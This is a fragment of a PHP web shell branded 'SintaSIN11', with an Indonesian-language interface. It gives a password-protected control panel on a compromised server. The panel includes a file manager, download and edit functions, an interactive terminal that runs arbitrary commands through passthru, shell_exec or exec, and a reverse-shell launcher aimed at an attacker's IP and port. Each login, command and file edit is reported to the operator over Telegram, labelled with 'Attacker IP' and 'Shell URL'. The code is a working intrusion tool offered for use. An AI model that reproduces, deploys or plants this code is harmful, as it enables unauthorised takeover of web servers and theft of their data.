header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=\"" . @basename($file) . "\""); header("Content-Transfer-Encoding: binary"); header("Expires: 0"); header("Cache-Control: must-revalidate"); header("Pragma: public"); header("Content-Length: " . 
@filesize($file)); @flush(); @readfile($file); exit; } else { @http_response_code(404); echo "❌ Gagal: file tidak ditemukan atau tidak valid."; exit; } } if (isset($_GET['edit']) && isset($_GET['ajax']) && @is_file($_GET['edit'])) { $file = $_GET['edit']; $content = @file_get_contents($file); echo "<h3>📝 Edit File: " . htmlspecialchars(@basename($file)) . "</h3> <form onsubmit='saveFile(event); return false;'> <input type='hidden' id='editFilePath' value='" . htmlspecialchars($file) . "'> <textarea id='fileContent' style='min-height: 400px; font-family: monospace; font-size: 14px;'>" . htmlspecialchars($content) . "</textarea> <button type='submit' style='margin-top: 10px; background: #009933; color: white;'>💾 Save Changes</button> </form> <div id='editStatus' style='margin-top: 10px;'></div>"; exit; } if (isset($_POST['save_edit'])) { $file = $_POST['target_file']; $data = $_POST['new_content']; @ob_clean(); $result = @file_put_contents($file, $data); if ($result === false) { echo "ERROR: Tidak bisa menulis ke file: $file"; } else { @chmod($file, 0666); $edited_web_url = get_web_url_from_path($file); $report_message = "\u{1F4DD} <b>FILE EDITED/SAVED!</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>File Name:</b> <code>" . htmlspecialchars(basename($file)) . "</code>\n"; $report_message .= "<b>File URL:</b> <a href=\"" . htmlspecialchars($edited_web_url) . "\">" . htmlspecialchars($edited_web_url) . "</a>\n"; $report_message .= "<b>Size (Bytes):</b> <code>" . @strlen($data) . 
"</code>\n"; send_telegram_report($report_message); echo "OK"; } exit; } if (isset($_GET['terminal']) && isset($_GET['ajax'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { @ob_clean(); $cwd = $_SESSION['terminal_cwd'] ?? @getcwd(); if (isset($_POST['set_dir'])) { $cwd = @realpath($_POST['set_dir']) ? @realpath($_POST['set_dir']) : $_POST['set_dir']; $_SESSION['terminal_cwd'] = $cwd; } if (!@is_dir($cwd)) { $cwd = @getcwd(); $_SESSION['terminal_cwd'] = $cwd; } $cmd = $_POST['cmd'] ?? ''; $output_for_report = ''; $is_cd = false; if (@preg_match('/^\s*cd\s*(.*)$/', $cmd, $matches)) { $is_cd = true; $path = @trim($matches[1]); if (empty($path) || $path === '~' || $path === '/') { $newDir = @getenv('HOME') ?: (@getenv('USERPROFILE') ?: '/'); } elseif ($path === '-') { $newDir = $_SESSION['prev_dir'] ?? $cwd; } else { $newDir = $cwd . DIRECTORY_SEPARATOR . $path; $resolvedDir = @realpath($newDir); $newDir = $resolvedDir ? $resolvedDir : $newDir; } if (@is_dir($newDir)) { $_SESSION['prev_dir'] = $cwd; $_SESSION['terminal_cwd'] = $newDir; $output_for_report = "Directory changed to: " . $newDir; echo "__CHDIR__:" . $newDir; } else { $output_for_report = "cd failed: No such file or directory, or permission denied."; echo "❌ cd: " . htmlspecialchars($path) . ": No such file or directory, or permission denied."; } } else { @chdir($cwd); $output = ''; $escaped_cmd = trim($cmd); if (@function_exists('passthru')) { @ob_start(); @passthru($escaped_cmd . ' 2>&1', $return_var); $output = @ob_get_clean(); } elseif (@function_exists('shell_exec')) { $output = @shell_exec($escaped_cmd . ' 2>&1'); } elseif (@function_exists('exec')) { $output_array = []; @exec($escaped_cmd . ' 2>&1', $output_array); $output = @implode("\n", $output_array); } if (empty($output) && $cmd !== '') { $disabled_functions = @ini_get('disable_functions'); $output_for_report = "Command execution failed. Disabled functions: " . (empty($disabled_functions) ? 
"None" : $disabled_functions); echo "❌ Command execution failed on the server.\n"; echo " - Alasan: Semua fungsi eksekusi perintah gagal atau tidak tersedia.\n"; echo " - Cek 'disable_functions': " . (empty($disabled_functions) ? "None" : htmlspecialchars($disabled_functions)) . "\n"; } else { $output_for_report = trim(substr(str_replace("\n", " | ", $output), 0, 100)) . (strlen($output) > 100 ? '...' : ''); echo $output; } } if (!$is_cd || strpos($output_for_report, 'failed') !== false) { if (!empty($cmd) || strpos($output_for_report, 'failed') !== false) { $report_message = "\u{1F4BB} <b>TERMINAL COMMAND REPORT</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . "</code>\n"; $report_message .= "<b>Command:</b> <code>" . htmlspecialchars($cmd) . "</code>\n"; $report_message .= "<b>Output Snippet:</b> <code>" . htmlspecialchars($output_for_report) . "</code>\n"; send_telegram_report($report_message); } } exit; } $currentDir = isset($_GET['dir']) ? $_GET['dir'] : @getcwd(); $currentDir = @realpath($currentDir) ? 
@realpath($currentDir) : $currentDir; if (!@is_dir($currentDir)) { $currentDir = @getcwd(); } $_SESSION['terminal_cwd'] = $currentDir; ?> <style> .terminal-wrapper { background: #000; color: #0f0; font-family: 'Courier New', monospace; display: flex; flex-direction: column; height: 500px; } #terminal-output { flex: 1; padding: 10px; overflow-y: scroll; white-space: pre-wrap; font-size: 14px; line-height: 1.4; border-bottom: 2px solid #555; } #terminal-input-container { display: flex; background: #111; padding: 5px; } .prompt { color: #00ff00; padding: 8px; font-weight: bold; align-self: center; } #terminal-input { flex: 1; background: #000; color: #0f0; border: none; padding: 8px; font-family: 'Courier New', monospace; font-size: 14px; outline: none !important; } #terminal-execute { background: #00cc66; color: white; border: none; padding: 8px 12px; cursor: pointer; font-family: 'Courier New', monospace; font-size: 14px; margin-left: 5px;} #terminal-execute:hover { background: #00994d; } </style> <div class="terminal-wrapper"> <h3 style="margin-top: 0;">💻 Terminal Interaktif</h3> <p style="margin: 5px 0; color: #55ff55; font-size: 13px;">Current Directory: <span id="currentDirDisplay"><?= htmlspecialchars($currentDir) ?></span></p> <div id="terminal-output"></div> <div id="terminal-input-container"> <div class="prompt">>></div> <input type="text" id="terminal-input" autocomplete="off" placeholder="ls -la"> <button id="terminal-execute">Execute</button> </div> </div> <script> // Terminal variables let terminalInitialized = false; let currentTerminalDir = '<?= htmlspecialchars($currentDir) ?>'; let commandHistory = []; let historyIndex = 0; // Initialize terminal when modal opens function initTerminal() { if (terminalInitialized) return; const output = document.getElementById('terminal-output'); const input = document.getElementById('terminal-input'); const dirDisplay = document.getElementById('currentDirDisplay'); const executeBtn = 
document.getElementById('terminal-execute'); // Clear and initialize output output.innerText = "PHP Interactive Shell Ready.\nType 'help' for functions/info.\n"; output.scrollTop = output.scrollHeight; // Function to send command function sendTerminalCommand() { const cmd = input.value.trim(); if (!cmd) return; // Add to history if (commandHistory[commandHistory.length - 1] !== cmd) { commandHistory.push(cmd); } historyIndex = commandHistory.length; // Display command output.innerText += "$ " + cmd + "\n"; output.scrollTop = output.scrollHeight; input.value = ''; // Prepare data const formData = new FormData(); formData.append('cmd', cmd); formData.append('set_dir', currentTerminalDir); // Send to server fetch("?terminal=1&ajax=1", { method: "POST", body: formData }) .then(response => { if (!response.ok) { throw new Error('Network response was not ok'); } return response.text(); }) .then(resp => { if (resp.startsWith("__CHDIR__:")) { currentTerminalDir = resp.substring(10); dirDisplay.innerText = currentTerminalDir; output.innerText += "Directory changed to: " + currentTerminalDir + "\n"; } else { output.innerText += resp + "\n"; } output.scrollTop = output.scrollHeight; }) .catch(error => { output.innerText += "❌ Error: " + error.message + "\n"; output.scrollTop = output.scrollHeight; }); } // Event listeners executeBtn.addEventListener('click', sendTerminalCommand); input.addEventListener('keydown', function(e) { if (e.key === 'Enter') { sendTerminalCommand(); } else if (e.key === 'ArrowUp') { e.preventDefault(); if (historyIndex > 0) { historyIndex--; input.value = commandHistory[historyIndex] || ''; } } else if (e.key === 'ArrowDown') { e.preventDefault(); if (historyIndex < commandHistory.length - 1) { historyIndex++; input.value = commandHistory[historyIndex] || ''; } else { historyIndex = commandHistory.length; input.value = ''; } } }); // Focus input input.focus(); terminalInitialized = true; } </script> <?php exit; } $rootDir = @getcwd(); $currentDir = 
@isset($_GET['dir']) ? $_GET['dir'] : $rootDir; $currentDir = @realpath($currentDir) ? @realpath($currentDir) : $currentDir; if (!@is_dir($currentDir)) { $currentDir = $rootDir; } @chdir($currentDir); $error = ''; if (@isset($_POST['login'])) { $pass_input = $_POST['pass'] ?? ''; $pass_attempt_hash = @md5($pass_input); $user_input = $_POST['user'] ?? ''; $user_attempt_hash = @md5($user_input); if ($user_attempt_hash === $valid_user && $pass_attempt_hash === $valid_pass) { @session_regenerate_id(true); $_SESSION['logged_in'] = true; send_telegram_report(get_initial_info() . "\n<b>Status:</b> \u{1F513} LOGIN SUCCESS\n<b>Username:</b> <code>{$user_input}</code>"); header("Location: ".$_SERVER['PHP_SELF']); exit; } else { $error = "Username atau Password salah!"; } } if (@isset($_GET['logout'])) { if (@isset($_SESSION['logged_in'])) { $report_message = "\u{1F6AA} <b>LOGOUT REPORT</b>\n"; $report_message .= "==============================\n"; $report_message .= "<b>Shell URL:</b> <a href=\"" . get_base_url() . ($_SERVER['REQUEST_URI'] ?? '/') . "\">" . get_base_url() . "</a>\n"; $report_message .= "<b>Attacker IP:</b> <code>" . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . 
"</code>\n"; $report_message .= "<b>Status:</b> Logged out/Session Ended\n"; send_telegram_report($report_message); } @session_destroy(); header("Location: ".$_SERVER['PHP_SELF']); exit; } if (empty($_SESSION['logged_in'])): ?> <!DOCTYPE html> <html lang="id"> <head> <meta charset="UTF-8"> <title>Login - SintaSIN11</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body { margin: 0; padding: 0; background: #0e0e0e url('https://res.cloudinary.com/dstvfk3po/image/upload/v1753163504/background_eza5fr.webp') no-repeat center center fixed; background-size: cover; font-family: 'Courier New', monospace; color: #eee; display: flex; justify-content: center; align-items: center; height: 100vh; } .login-box { background: rgba(0, 0, 0, 0.85); padding: 40px; border-radius: 8px; box-shadow: 0 0 10px #00ffcc; width: 300px; text-align: center; } .login-box h2 { margin-bottom: 20px; color: #00ffcc; } .login-box input[type="text"], .login-box input[type="password"] { width: 100%; padding: 10px; margin: 8px 0; background: #1a1a1a; border: 1px solid #333; border-radius: 4px; color: #0ff; } .login-box input[type="submit"] { background: #00bfff; border: none; padding: 10px; width: 100%; max-width: 100%; display: block; margin: 16px auto 0; border-radius: 4px; color: #000; font-weight: bold; cursor: pointer; } .login-box form { display: flex; flex-direction: column; align-items: center; } .login-box input[type="submit"]:hover { background: #00dfff; } .error { color: #ff4444; margin-bottom: 10px; } .footer { margin-top: 20px; font-size: 12px; color: #777; } </style> </head> <body> <div class="login-box"> <h2>LOGIN PANEL</h2> <?php if ($error) echo "<div class='error'>$error</div>"; ?> <form method="post"> <input type="text" name="user" placeholder="Username" required> <input type="password" name="pass" placeholder="Password" required> <input type="submit" name="login" value="Login"> </form> <div class="footer"> By <a href="https://t.me/SintaSIN11" 
target="_blank" style="color:#00bfff;">@SintaSIN11</a> </div> </div> </body> </html> <?php exit; endif; if (@isset($_SESSION['notification'])) { $notif = $_SESSION['notification']; $type = $notif['type']; $message = $notif['message']; $bgColor = ($type === 'success') ? '#4CAF50' : '#f44336'; echo "<div id='notification' style='position:fixed;top:20px;right:20px;background:$bgColor;color:white;padding:15px;border-radius:5px;z-index:9999;box-shadow:0 0 10px rgba(0,0,0,0.5);'> " . ($type === 'success' ? '✅' : '❌') . " $message </div>"; unset($_SESSION['notification']); echo "<script> setTimeout(function() { var notif = document.getElementById('notification'); if (notif) notif.style.display = 'none'; }, 3000); </script>"; } ?> <!DOCTYPE html> <html> <head> <title>PANEL SintaSIN11</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <style> body { background: url('https://res.cloudinary.com/dstvfk3po/image/upload/v1753105097/wolf_cmybnd.webp') no-repeat center center fixed; background-size: cover; color: #ddd; font-family: monospace; margin: 0; min-height: 100vh; display: flex; flex-direction: column; } .nav { background: #222; padding: 10px; display: flex; gap: 10px; justify-content: center; flex-wrap: wrap; border-bottom: 2px solid #00ffcc; } .nav button { background: #333; color: #fff; border: none; padding: 8px 16px; border-radius: 4px; cursor: pointer; transition: 0.3s; } .nav button:hover { background: #555; box-shadow: 0 0 5px #00ffcc; } .section { padding: 20px; } a { color: #61dafb; text-decoration: none; } .modal { display: none; position: fixed; z-index: 9999; left: 0; top: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.8); } .modal-content { background: #222; margin: 5% auto; padding: 20px; width: 90%; max-width: 900px; color: #fff; border-radius: 5px; box-shadow: 0 0 15px #00ffcc; position: relative; max-height: 90vh; overflow-y: auto; } .modal-close { position: absolute; top: 10px; right: 15px; 
cursor: pointer; color: #aaa; font-size: 20px; } input[type="text"], input[type="number"], textarea { background: #2e2e2e; color: #fff; border: 1px solid #444; padding: 8px; width: 100%; margin: 5px 0 10px 0; box-sizing: border-box; } textarea { min-height: 200px; resize: vertical; } .file-line { display: flex; justify-content: space-between; align-items: center; padding: 4px 0; border-top: 1px solid #333; } .file-line:hover { background: rgba(255, 255, 255, 0.08); } .file-line:first-child { border-top: none; } .file-line > span { white-space: nowrap; overflow: hidden; text-overflow: ellipsis; } .file-line-header > span:nth-child(2), .file-line > span:nth-child(2) { flex: 1.5; text-align: center; } footer { background: #111; border-top: 1px solid #333; color: #777; text-align: center; padding: 15px; font-size: 12px; } footer a { color: #00bfff; text-decoration: none; } footer > div { margin-top: 5px; } @media (max-width: 768px) { .header-info { flex-direction: column !important; align-items: center !important; } .header-info > div:first-child { width: 100%; margin-bottom: 10px; } .nav { flex-direction: row; } .nav button, .nav form { margin: 5px 2px; } .file-line { flex-wrap: wrap; } .file-line > span:nth-child(1) { flex: 1 1 100%; margin-bottom: 5px; } .file-line > span:nth-child(2) { order: 3; flex: 1 1 50%; text-align: left !important; } .file-line > span:nth-child(3) { order: 2; flex: 1 1 50%; text-align: right !important; } } </style> </head> <body> <div class="header-info" style="display: flex; justify-content: space-between; align-items: flex-start; background: #111; color: #00ffcc; padding: 20px; border-bottom: 1px solid #444;"> <div style="flex: 1;"> <div style="font-size: 24px; font-weight: bold;">PANEL SintaSIN11</div> <div style="font-size: 14px; color: #ffcc00; margin-top: 5px;">Version: <?= WEBSHELL_VERSION; ?></div> <div style="max-width: 100%; width: 100%; border-top: 1px solid #444; margin: 10px 0;"></div> <div style="font-size: 13px; color: #ccc; 
line-height: 1.5;"> <b>SERVER INFO:</b><br> OS: <?= @php_uname(); ?><br> PHP Version: <?= @phpversion(); ?><br> Disabled Functions: <?= @ini_get('disable_functions') ?: 'None'; ?><br> Working Dir: <code><?= htmlspecialchars($currentDir); ?></code> </div> </div> <div style="flex: 0 0 160px; text-align: center;"> <img src="https://res.cloudinary.com/dstvfk3po/image/upload/v1728405789/SINTASIN2_lncxzy.jpg" style="width: 120px; height: 120px; object-fit: cover; border-radius: 8px; box-shadow: 0 0 8px #00ffcc;"> <div style="margin-top: 8px;"> <a href="https://t.me/SintaSIN11" target="_blank" style="color: #00bfff; font-size: 13px;"> <img src="https://cdn-icons-png.flaticon.com/512/2111/2111646.png" style="width: 14px; height: 14px;">@SintaSIN11 </a> </div> <div style="margin-top: 15px;"> <a href="?logout=1"> <button style="padding: 6px 14px; background-color: #ff4444; color: #fff; border: none; border-radius: 4px; cursor: pointer; font-family: monospace;"> 🚪 Logout </button> </a> </div> </div> </div> <div class="nav" style="flex-wrap: wrap; gap: 5px;"> <a href="?dir=<?= urlencode($rootDir); ?>"><button>🏠 Home</button></a> <form method="post" enctype="multipart/form-data" style="display:inline;" id="uploadForm"> <input type="file" name="upload_file" id="uploadFile" style="display:none;" onchange="document.getElementById('uploadForm').submit()"> <button type="button" onclick="document.getElementById('uploadFile').click()">⬆️ Upload File</button> </form> <form method="post" style="display:inline-flex; align-items:center;"> <input type="text" name="folder_name" placeholder="📂 Folder Name" style="padding:4px; max-width:110px;"> <button type="submit" name="create_folder" style="height: 35px; margin-left: 5px;">Create Folder</button> </form> <form method="post" style="display:inline-flex; align-items:center;"> <input type="text" name="file_name" placeholder="📄 File.txt" style="padding:4px; max-width:110px;"> <button type="submit" name="create_file" style="height: 35px; 
margin-left: 5px;">Create File</button> </form> <button onclick="openModalWithURL('?terminal=1&ajax=1&dir=<?= urlencode($currentDir) ?>'); return false;">💻 Terminal</button> <button onclick="initReverseShell()">📡 Reverse Shell</button> <button onclick="openModalWithURL('?shell_finder=1&ajax=1')">🔎</button> <button onclick="openModalWithURL('?defense_shell=1&ajax=1')">🛡️</button> </div> <main style="flex: 1; overflow-y: auto;"> <div class="section"> <h3>File Manager</h3> <?php $items = @scandir($currentDir); if ($items === false) { echo "<p style='color:red;'>Gagal membaca isi direktori: Permission Denied atau Path Tidak Valid ({$currentDir}).</p>"; $items = []; } else { $dirs = @array_filter($items, function($item) use ($currentDir) { return ($item !== '.' && $item !== '..' && @is_dir($currentDir . DIRECTORY_SEPARATOR . $item)); }); $files = @array_filter($items, function($item) use ($currentDir) { return ($item !== '.' && $item !== '..' && @is_file($currentDir . DIRECTORY_SEPARATOR . $item)); }); @sort($dirs); @sort($files); $items = @array_merge(['..'], $dirs, $files); } $parent = @dirname($currentDir); $is_root_dir = false; if (@realpath($currentDir) === '/' || empty($currentDir) || $parent === $currentDir) { $is_root_dir = true; } if ($parent === $currentDir) { if (@realpath($currentDir) === '/') { $is_root_dir = true; } $parent = '/'; } else { $is_root_dir = false; } echo "<div class='file-line file-line-header' style='font-weight: bold; padding: 4px 0; border-top: 1px solid #444; border-bottom: 2px solid #00ffcc;'>"; echo "<span style='flex: 3; max-width: 350px; color: #fff;'>Direktori</span>"; echo "<span style='text-align: center; color: #ffcc00;'>Modifikasi</span>"; echo "<span style='flex: 1; text-align: center; color: #ffcc00;'>Size</span>"; echo "<span style='flex: 1; text-align: center; color: #00ffcc;'>Perms</span>"; echo "<span style='flex: 1; text-align: right; color: #fff;'>Aksi</span>"; echo "</div>"; foreach ($items as $item) { $is_parent_dir = 
$item === '..'; if ($is_parent_dir && $is_root_dir) continue; $fullPath = $is_parent_dir ? $parent : @rtrim($currentDir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $item; $isDir = $is_parent_dir ? true : @is_dir($fullPath); $icon = $is_parent_dir ? "↩️" : ($isDir ? "📁" : "📄"); $safe_item_name = $is_parent_dir ? 'Parent Directory' : @htmlspecialchars($item); $encoded_path = @urlencode($fullPath); $modTime = @filemtime($fullPath); $modTimeFormatted = ($modTime !== false && $modTime > 0) ? date('Y-m-d', $modTime) : 'N/A'; @$permStr = get_perms_string($fullPath); @$size = (!$isDir) ? @round(@filesize($fullPath)/1024, 2) . ' KB' : '-'; echo "<div class='file-line'>"; if ($isDir) { echo "<span style='flex: 3; max-width: 350px;'>$icon <a href='?dir=" . ($is_parent_dir ? $encoded_path : $encoded_path) . "'>$safe_item_name</a></span>"; } else { echo "<span style='flex: 3; max-width: 350px;'>$icon <a href='?download=$encoded_path' title='Download/View'>$safe_item_name</a></span>"; } echo "<span style='text-align: center; color: #ccc;'>$modTimeFormatted</span>"; echo "<span style='flex: 1; text-align: center; color: #ffcc00;'>$size</span>"; echo "<span style='flex: 1; text-align: center; cursor:pointer; color:#00ffcc;' onclick=\"openModalWithURL('?chmod_modal=$encoded_path&ajax=1');\">$permStr</span>"; echo "<span style='flex: 1; text-align: right;'>"; if (!$isDir) { echo "<a href='#' onclick=\"openModalWithURL('?edit=$encoded_path&ajax=1'); return false;\" title='Edit' style='padding-right: 5px;'>📝</a>"; } if (!$is_parent_dir) { echo "<a href='#' onclick=\"openModalWithURL('?rename=$encoded_path&ajax=1'); return false;\" title='Rename'>🔁</a>"; echo "<a href='?delete=$encoded_path&dir=" . @urlencode($currentDir) . 
"' onclick=\"return confirm('Hapus $safe_item_name?');\" title='Delete'>❌</a>"; } echo "</span></div>"; } ?> </div> </main> <div class="modal" id="popupModal"> <div class="modal-content"> <span class="modal-close" onclick="closeModal()">×</span> <div id="modalBody">Loading...</div> </div> </div> <div class="modal" id="reverseShellModal"> <div class="modal-content"> <span class="modal-close" onclick="closeReverseShellModal()">×</span> <h3>📡 Reverse Shell</h3> <form onsubmit="startReverseShell(event)"> <label style="font-size: 13px;">Your IP (Listening Host):</label> <input type="text" id="attackerIP" placeholder="192.168.1.100" required> <label style="font-size: 13px;">Port (Listening Port):</label> <input type="number" id="attackerPort" placeholder="4444" value="4444" required> <button type="submit" style="margin-top: 10px; background: #00bfff; color: #000; font-weight: bold;">Start Reverse Shell</button> </form> <div id="reverseShellStatus" style="margin-top: 10px; color: #fff;"></div> </div> </div> <footer> <div><a href="https://t.me/SintaSIN11" target="_blank">SintaSIN11</a> WebShell ©<?= date('Y'); ?> |</div> <div>IP Anda: <code><?= $_SERVER['REMOTE_ADDR'] ?? 
'Unknown'; ?></code></div> </footer> <script> function closeModal() { window.TerminalControlReady = false; document.getElementById('popupModal').style.display = 'none'; document.getElementById('modalBody').innerHTML = 'Loading...'; } function openModalWithURL(url) { const modal = document.getElementById('popupModal'); const body = document.getElementById('modalBody'); body.innerHTML = 'Loading...'; modal.style.display = 'block'; fetch(url) .then(res => res.text()) .then(html => { body.innerHTML = html; }) .catch(err => { body.innerHTML = '❌ Error loading modal.'; }); } function saveFile(e) { e.preventDefault(); const filePath = document.getElementById('editFilePath').value; const content = document.getElementById('fileContent').value; const status = document.getElementById('editStatus'); status.innerHTML = '🔄 Saving...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'save_edit=1&target_file=' + encodeURIComponent(filePath) + '&new_content=' + encodeURIComponent(content) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { status.innerHTML = '<span style="color: #00ff7f;">✔ File berhasil disimpan!</span>'; setTimeout(() => { closeModal(); location.reload(); }, 1500); } else { status.innerHTML = '<span style="color: #ff4444;">❌ ' + resp + '</span>'; } }) .catch(err => { status.innerHTML = '<span style="color: #ff4444;">❌ Network Error: ' + err.message + '</span>'; }); } function submitRename(e) { e.preventDefault(); const newName = document.getElementById('newName').value; const oldPath = document.getElementById('oldPath').value; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'do_rename=1&old_path=' + encodeURIComponent(oldPath) + '&new_name=' + encodeURIComponent(newName) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { const notif = document.createElement('div'); 
notif.id = 'notification'; notif.style.cssText = 'position:fixed;top:20px;right:20px;background:#4CAF50;color:white;padding:15px;border-radius:5px;z-index:9999;box-shadow:0 0 10px rgba(0,0,0,0.5);'; notif.innerHTML = '✅ Berhasil merubah nama!'; document.body.appendChild(notif); setTimeout(() => { notif.style.display = 'none'; closeModal(); location.reload(); }, 1000); } else { document.getElementById('renameStatus').innerHTML = '❌ ' + resp; } }); } function submitChmod(e) { e.preventDefault(); const perm = document.getElementById('newPerm').value; const file = document.getElementById('targetFile').value; const status = document.getElementById('chmodStatus'); status.innerHTML = '🔄 Mengubah permission...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'do_chmod=1&file=' + encodeURIComponent(file) + '&perm=' + encodeURIComponent(perm) }) .then(res => res.text()) .then(resp => { if (resp.trim() === "OK") { status.innerHTML = '<span style="color: #00ff7f;">✔ Permission diubah.</span>'; setTimeout(() => { closeModal(); location.reload(); }, 1000); } else { document.getElementById('chmodStatus').innerHTML = '❌ ' + resp; } }); } function initReverseShell() { document.getElementById('reverseShellModal').style.display = 'block'; document.getElementById('attackerIP').focus(); } function closeReverseShellModal() { document.getElementById('reverseShellModal').style.display = 'none'; document.getElementById('reverseShellStatus').innerHTML = ''; } function startReverseShell(e) { e.preventDefault(); const ip = document.getElementById('attackerIP').value; const port = document.getElementById('attackerPort').value; const status = document.getElementById('reverseShellStatus'); if (!ip || !port) { status.innerHTML = '❌ Please fill in both IP and Port'; return; } status.innerHTML = '🔄 Initiating reverse shell to ' + ip + ':' + port + '...'; fetch('<?= @$_SERVER['PHP_SELF'] ?>', { method: 'POST', headers: 
{ 'Content-Type': 'application/x-www-form-urlencoded' }, body: 'reverse_shell=1&ip=' + encodeURIComponent(ip) + '&port=' + encodeURIComponent(port) }) .then(res => res.text()) .then(resp => { status.innerHTML = resp; }) .catch(err => { status.innerHTML = '❌ Network Error: ' + err.message; }); } window.onclick = function(event) { const modal = document.getElementById('popupModal'); const rShellModal = document.getElementById('reverseShellModal'); if (event.target == rShellModal) { closeReverseShellModal(); } if (event.target == modal) { const modalBody = document.getElementById('modalBody'); if (!modalBody || modalBody.innerHTML.indexOf('Terminal Interaktif') === -1) { closeModal(); } } } </script> </body> </html>